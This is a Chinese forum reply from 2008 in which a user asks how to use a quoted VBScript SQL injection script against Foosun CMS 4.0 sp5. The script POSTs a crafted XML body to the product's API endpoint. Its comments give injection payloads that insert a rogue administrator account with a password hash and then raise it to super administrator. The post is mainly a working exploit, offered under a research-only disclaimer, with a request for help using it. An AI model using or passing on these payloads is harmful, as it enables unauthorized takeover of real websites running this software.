- 帖子
- 31
- 积分
- 47
- 威望
- 62
- 金钱
- 61
- 在线时间
- 0 小时
|
3楼
发表于 2008-7-20 18:02
| 只看该作者
兄弟,借个地方发帖求助。
我很菜啊。请教大家:
这样的代码如何编译利用??
引用:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com
Dim strData, strUrl, strGetinfo, xPost
strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username>'</username></body>"
strUrl = "http://demo.foosun.net/api/API_Response.asp"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", strUrl, False
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.SetRequestHeader "Referer", strUrl
xPost.send(strData)
'strGetinfo = xPost.ResponseText
strGetinfo = bytes2BSTR(xPost.ResponseBody)
Wscript.echo(strGetinfo)
Wscript.Quit
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 将返回内容转换成简体中文
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem ';insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values('Tr4c3','83aa400af464c76d')-- 添加一个普通管理员Tr4c3,密码12345678
Rem ';update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name='Tr4c3'-- 把Tr4c3提升为超级管理员
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
帖子17 精华0 积分64 阅读权限40 在线时间19 小时 注册时间2006-5-24 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP 软件项目外包
magickingdom123
晶莹剔透§烈日灼然 |
|